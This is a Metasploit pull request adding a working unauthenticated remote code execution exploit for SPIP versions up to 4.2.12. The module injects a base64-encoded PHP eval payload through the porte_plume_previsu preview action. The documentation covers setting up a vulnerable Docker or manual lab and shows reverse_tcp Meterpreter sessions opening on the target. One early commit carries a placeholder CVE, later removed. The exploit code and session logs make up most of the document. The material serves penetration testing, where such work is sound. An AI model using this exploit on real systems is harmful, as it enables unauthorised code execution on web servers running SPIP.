### PR TITLE
SPIP Unauthenticated RCE Exploit

### DIFF
--- a/documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
+++ b/documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
@@ -1,0 +1,136 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.
+The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input, allowing an attacker
+to inject and execute arbitrary PHP code.
+This can be achieved by crafting a payload that manipulates the templating data processed by the `echappe_retour()` function,
+which invokes `traitements_previsu_php_modeles_eval()`, containing an `eval()` call.
+
+To replicate a vulnerable environment for testing:
+
+1. Install SPIP using the provided Docker Compose configuration.
+2. Use the image `ipeos/spip:4.2.12` to ensure the environment is vulnerable.
+3. Verify that the SPIP instance is accessible on the local network.
+
+### Docker Setup
+
+Use the following Docker Compose file to set up the environment:
+
+```yaml
+version: '3.8'
+
+services:
+  db:
+    image: mariadb:10.5
+    restart: always
+    environment:
+      - MYSQL_ROOT_PASSWORD=MysqlRootPassword
+      - MYSQL_DATABASE=spip
+      - MYSQL_USER=spip
+      - MYSQL_PASSWORD=spip
+    networks:
+      - spip-network
+
+  app:
+    image: ipeos/spip:4.2.12
+    restart: always
+    depends_on:
+      - db
+    environment:
+      - SPIP_AUTO_INSTALL=1
+      - SPIP_DB_SERVER=db
+      - SPIP_DB_LOGIN=spip
+      - SPIP_DB_PASS=spip
+      - SPIP_DB_NAME=spip
+      - SPIP_SITE_ADDRESS=http://localhost:8880
+    ports:
+      - 8880:80
+    networks:
+      - spip-network
+
+networks:
+  spip-network:
+    driver: bridge
+```
+
+## Verification Steps
+
+1. Set up a SPIP instance with the specified Docker environment.
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/spip_porte_plume_previsu_rce`.
+4. Set `RHOSTS` to the local IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload.
+
+## Options
+
+No additional options are required for basic exploitation.
+
+## Scenarios
+
+### Successful Exploitation Against Local SPIP 4.2.12
+
+**Setup**:
+
+- Local SPIP instance with version 4.2.12.
+- Metasploit Framework.
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the module:
+```
+use exploit/multi/http/spip_porte_plume_previsu_rce
+```
+3. Set `RHOSTS` to the local IP (e.g., 127.0.0.1).
+4. Configure other necessary options (TARGETURI, SSL, etc.).
+5. Launch the exploit:
+```
+exploit
+```
+
+**Expected Results**:
+
+With `php/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Sending exploit payload to the target...
+[*] Sending stage (39927 bytes) to 172.23.0.3
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.23.0.3:35902) at 2024-08-10 21:56:50 +0200
+
+meterpreter > sysinfo
+Computer    : 5d309f4bdfbe
+OS          : Linux 5d309f4bdfbe 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Preparing to send exploit payload to the target...
+[*] Sending exploit payload to the target...
+[*] Sending stage (3045380 bytes) to 172.23.0.3
+[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.23.0.3:38992) at 2024-08-10 22:10:19 +0200
+
+meterpreter > sysinfo 
+Computer     : 172.23.0.3
+OS           : Debian 11.9 (Linux 5.15.0-113-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+- The module successfully exploits the vulnerability and opens a Meterpreter session on the target.
+
+**Note**: Ensure the SPIP instance is correctly configured and running in the Docker environment for the exploit to work as expected.

--- a/documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
+++ b/documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
@@ -53,6 +53,19 @@ networks:
     driver: bridge
 ```
 
+### Non-Docker Setup
+
+If you prefer not to use Docker, you can manually set up SPIP with the following commands:
+
+```bash
+wget https://files.spip.net/spip/archives/spip-v4.2.12.zip
+unzip spip-v4.2.12.zip
+cd spip-v4.2.12
+php -S 0.0.0.0:8000
+```
+
+Accessible at `http://localhost:8000`.
+
 ## Verification Steps
 
 1. Set up a SPIP instance with the specified Docker environment.
@@ -95,40 +108,43 @@ exploit
 With `php/meterpreter/reverse_tcp`:
 
 ```
-msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
+msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8000
 
 [*] Started reverse TCP handler on 192.168.1.36:4444 
-[!] AutoCheck is disabled, proceeding with exploitation
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.12
+[+] The target appears to be vulnerable. The detected SPIP version (4.2.12) is vulnerable.
+[*] Preparing to send exploit payload to the target...
 [*] Sending exploit payload to the target...
-[*] Sending stage (39927 bytes) to 172.23.0.3
-[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.23.0.3:35902) at 2024-08-10 21:56:50 +0200
+[*] Sending stage (39927 bytes) to 192.168.1.36
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:56534) at 2024-08-19 19:43:18 +0200
 
-meterpreter > sysinfo
-Computer    : 5d309f4bdfbe
-OS          : Linux 5d309f4bdfbe 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
+meterpreter > sysinfo 
+Computer    : linux
+OS          : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
 Meterpreter : php/linux
-meterpreter > 
 ```
 
 With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
 
 ```
-msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
+msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8000
 
 [*] Started reverse TCP handler on 192.168.1.36:4444 
-[!] AutoCheck is disabled, proceeding with exploitation
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.12
+[+] The target appears to be vulnerable. The detected SPIP version (4.2.12) is vulnerable.
 [*] Preparing to send exploit payload to the target...
 [*] Sending exploit payload to the target...
-[*] Sending stage (3045380 bytes) to 172.23.0.3
-[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.23.0.3:38992) at 2024-08-10 22:10:19 +0200
+[*] Sending stage (3045380 bytes) to 192.168.1.36
+[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.1.36:59106) at 2024-08-19 19:44:40 +0200
 
 meterpreter > sysinfo 
-Computer     : 172.23.0.3
-OS           : Debian 11.9 (Linux 5.15.0-113-generic)
+Computer     : 192.168.1.36
+OS           : LinuxMint 21.3 (Linux 5.15.0-113-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
-meterpreter > 
 ```
 
 - The module successfully exploits the vulnerability and opens a Meterpreter session on the target.

--- a/documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
+++ b/documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
@@ -28,8 +28,8 @@ services:
       - MYSQL_DATABASE=spip
       - MYSQL_USER=spip
       - MYSQL_PASSWORD=spip
-    networks:
-      - spip-network
+    volumes:
+      - mysql-data:/var/lib/mysql
 
   app:
     image: ipeos/spip:4.2.12
@@ -37,21 +37,34 @@ services:
     depends_on:
       - db
     environment:
-      - SPIP_AUTO_INSTALL=1
+      - SPIP_SITE_ADDRESS=http://localhost:8880
       - SPIP_DB_SERVER=db
       - SPIP_DB_LOGIN=spip
       - SPIP_DB_PASS=spip
       - SPIP_DB_NAME=spip
-      - SPIP_SITE_ADDRESS=http://localhost:8880
+      - SPIP_AUTO_INSTALL=1
     ports:
       - 8880:80
-    networks:
-      - spip-network
+    volumes:
+      - spip-data:/var/www/html
 
-networks:
-  spip-network:
-    driver: bridge
+volumes:
+  spip-data:
+  mysql-data:
 ```
+
+This Docker Compose file configures a SPIP environment with a MariaDB backend, enabling automatic installation.
+Here are the correct setup details:
+
+- **SPIP Access URL:** `http://localhost:8880`
+- **Database Configuration:** Utilizes MariaDB, as specified by the database service setup.
+- **Automatic Installation:** Enabled via `SPIP_AUTO_INSTALL=1`.
+
+After launching the Docker container, SPIP will be accessible at `http://localhost:8880`.
+The automatic installation will simplify the initial setup, allowing you to start using SPIP without manual configuration.
+
+If you decide to disable automatic installation by setting `SPIP_AUTO_INSTALL` to `0`, you will need to manually configure SPIP.
+To do this, after starting the container, navigate to `http://localhost:8880/ecrire` to access the SPIP web installation panel.
 
 ### Non-Docker Setup
 

--- a/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
+++ b/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
@@ -89,9 +89,9 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("SPIP Version detected: #{version}")
 
     if Rex::Version.new(version) > Rex::Version.new('4.2.12')
-          return CheckCode::Safe("The detected SPIP version (#{version}) is not vulnerable.")
+      return CheckCode::Safe("The detected SPIP version (#{version}) is not vulnerable.")
     end
-    
+
     return CheckCode::Appears("The detected SPIP version (#{version}) is vulnerable.")
   end
 

--- a/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
+++ b/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
@@ -104,13 +104,14 @@ class MetasploitModule < Msf::Exploit::Remote
         $c = base64_decode("#{encoded_clean_payload}");
         #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
     END_OF_PHP_CODE
-    return framework.encoders.create('php/base64').encode(shell)
+    return shell
   end
 
   def exploit
     print_status('Preparing to send exploit payload to the target...')
-    compacted_payload = target['Arch'] == ARCH_PHP ? framework.encoders.create('php/base64').encode(payload.encoded) : php_exec_cmd(payload.encoded)
-    payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{compacted_payload} ?>`]"
+    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    b64_payload = framework.encoders.create('php/base64').encode(phped_payload)
+    payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{b64_payload} ?>`]"
 
     Rex.sleep(0.5)
 

--- a/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
+++ b/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
@@ -1,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Payload::Php
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SPIP Unauthenticated RCE via porte_plume Plugin',
+        'Description' => %q{
+          This module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.
+          The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input,
+          allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a
+          payload that manipulates the templating data processed by the `echappe_retour()` function, which invokes
+          `traitements_previsu_php_modeles_eval()`, containing an `eval()` call.
+        },
+        'Author' => [
+          'Valentin Lobstein',  # Metasploit module author
+          'Laluka'              # Vulnerability discovery
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-1234'], # I don't know
+          ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html'],
+          ['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather']
+        ],
+        'Platform' => ['php', 'unix', 'linux', 'win'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
+          [
+            'PHP In-Memory', {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command Shell', {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2024-08-16',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path, 'spip.php')
+    res = send_request_cgi({ 'uri' => uri.to_s })
+
+    return Exploit::CheckCode::Unknown('Target is unreachable.') unless res
+    return Exploit::CheckCode::Unknown("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text
+    return Exploit::CheckCode::Unknown('Unable to find the version string on the page: spip.php') unless version_string =~ /SPIP (.*)/
+
+    version = ::Regexp.last_match(1)
+
+    if version.nil? && res.headers['Composed-By'] =~ /SPIP (.*) @/
+      version = ::Regexp.last_match(1)
+    end
+
+    return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless version
+
+    print_status("SPIP Version detected: #{version}")
+
+    if Rex::Version.new(version) <= Rex::Version.new('4.2.12')
+      return CheckCode::Appears("The detected SPIP version (#{version}) is vulnerable.")
+    else
+      return CheckCode::Safe("The detected SPIP version (#{version}) is not vulnerable.")
+    end
+  end
+
+  def php_exec_cmd(encoded_payload)
+    dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
+    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
+    shell = <<-END_OF_PHP_CODE
+        #{php_preamble(disabled_varname: dis)}
+        $c = base64_decode("#{encoded_clean_payload}");
+        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+    return Rex::Text.encode_base64(shell).to_s
+  end
+
+  def exploit
+    print_status('Preparing to send exploit payload to the target...')
+    compacted_payload = target['Arch'] == ARCH_PHP ? Rex::Text.encode_base64(payload.raw) : php_exec_cmd(payload.encoded)
+    payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php eval(base64_decode('#{compacted_payload}')); ?>`]"
+
+    Rex.sleep(0.5)
+
+    print_status('Sending exploit payload to the target...')
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'spip.php'),
+      'vars_get' => {
+        'action' => 'porte_plume_previsu'
+      },
+      'data' => "data=#{payload}"
+    })
+  end
+
+end

--- a/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
+++ b/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
@@ -104,13 +104,13 @@ class MetasploitModule < Msf::Exploit::Remote
         $c = base64_decode("#{encoded_clean_payload}");
         #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
     END_OF_PHP_CODE
-    return Rex::Text.encode_base64(shell).to_s
+    return framework.encoders.create('php/base64').encode(shell)
   end
 
   def exploit
     print_status('Preparing to send exploit payload to the target...')
-    compacted_payload = target['Arch'] == ARCH_PHP ? Rex::Text.encode_base64(payload.raw) : php_exec_cmd(payload.encoded)
-    payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php eval(base64_decode('#{compacted_payload}')); ?>`]"
+    compacted_payload = target['Arch'] == ARCH_PHP ? framework.encoders.create('php/base64').encode(payload.encoded) : php_exec_cmd(payload.encoded)
+    payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{compacted_payload} ?>`]"
 
     Rex.sleep(0.5)
 

--- a/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
+++ b/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
@@ -88,11 +88,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("SPIP Version detected: #{version}")
 
-    if Rex::Version.new(version) <= Rex::Version.new('4.2.12')
-      return CheckCode::Appears("The detected SPIP version (#{version}) is vulnerable.")
-    else
-      return CheckCode::Safe("The detected SPIP version (#{version}) is not vulnerable.")
+    if Rex::Version.new(version) > Rex::Version.new('4.2.12')
+          return CheckCode::Safe("The detected SPIP version (#{version}) is not vulnerable.")
     end
+    
+    return CheckCode::Appears("The detected SPIP version (#{version}) is vulnerable.")
   end
 
   def php_exec_cmd(encoded_payload)

--- a/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
+++ b/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
@@ -113,8 +113,6 @@ class MetasploitModule < Msf::Exploit::Remote
     b64_payload = framework.encoders.create('php/base64').encode(phped_payload)
     payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{b64_payload} ?>`]"
 
-    Rex.sleep(0.5)
-
     print_status('Sending exploit payload to the target...')
     send_request_cgi({
       'method' => 'POST',

--- a/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
+++ b/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
@@ -19,8 +19,8 @@ class MetasploitModule < Msf::Exploit::Remote
           This module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.
           The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input,
           allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a
-          payload that manipulates the templating data processed by the `echappe_retour()` function, which invokes
-          `traitements_previsu_php_modeles_eval()`, containing an `eval()` call.
+          payload manipulating the templating data processed by the `echappe_retour()` function, invoking
+          `traitements_previsu_php_modeles_eval()`, which contains an `eval()` call.
         },
         'Author' => [
           'Valentin Lobstein',  # Metasploit module author

--- a/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
+++ b/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
@@ -26,7 +26,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'Valentin Lobstein',  # Metasploit module author
           'Laluka',             # Vulnerability discovery
           'Julien Voisin'       # Review
-
         ],
         'License' => MSF_LICENSE,
         'References' => [

--- a/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
+++ b/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
@@ -24,7 +24,9 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'Valentin Lobstein',  # Metasploit module author
-          'Laluka'              # Vulnerability discovery
+          'Laluka',             # Vulnerability discovery
+          'Julien Voisin'       # Review
+
         ],
         'License' => MSF_LICENSE,
         'References' => [

--- a/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
+++ b/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
@@ -28,7 +28,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'License' => MSF_LICENSE,
         'References' => [
-          ['CVE', '2024-1234'], # I don't know
           ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html'],
           ['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather']
         ],


### PR DESCRIPTION
# SPIP Unauthenticated RCE Exploit

Hello, Metasploit Team,

This PR introduces a new Metasploit module that exploits a Remote Code Execution (RCE) vulnerability in SPIP versions up to and including 4.2.12. The vulnerability is detailed in [this blog post](https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather/). While I don't have the CVE ID for this issue yet, a patch has already been released.

You can refer to the module documentation for instructions on setting up a vulnerable environment using Docker and from source. 

cc: @jvoisin @laluka

